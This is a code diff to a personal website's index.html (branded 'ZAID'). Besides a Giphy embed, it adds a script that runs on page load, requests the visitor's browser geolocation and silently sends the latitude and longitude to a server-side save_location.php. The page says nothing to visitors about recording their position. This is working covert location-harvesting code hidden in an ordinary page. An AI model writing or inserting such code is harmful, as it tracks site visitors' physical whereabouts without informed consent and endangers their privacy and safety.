--- a/index.html
+++ b/index.html
@@ -10,7 +10,32 @@
 
     
 </head>
-<body>
+<body onload="getLocation()">
+       <iframe src="https://giphy.com/embed/7FrOU9tPbgAZtxV5mb" width="480" height="480" frameBorder="0" class="giphy-embed" allowFullScreen></iframe><p><a href="https://giphy.com/gifs/code-security-binary-7FrOU9tPbgAZtxV5mb">via GIPHY</a></p>
+
+
+
+<p id="demo"></p>
+
+<script>
+var x = document.getElementById("demo");
+
+function getLocation() {
+  if (navigator.geolocation) {
+    navigator.geolocation.getCurrentPosition(showPosition);
+  } else { 
+    x.innerHTML = "Geolocation is not supported by this browser.";
+  }
+}
+
+function showPosition(position) {
+    const xhttp = new XMLHttpRequest ();
+xhttp.open("GET", "save_location.php?lat="+ position.coords.latitude+"&long=" + position.coords.longitude);
+xhttp.send();
+
+}
+</script>
+
     <header>
         <a href="#" class="logo">ZAID</a> 
         <nav class="navigation">
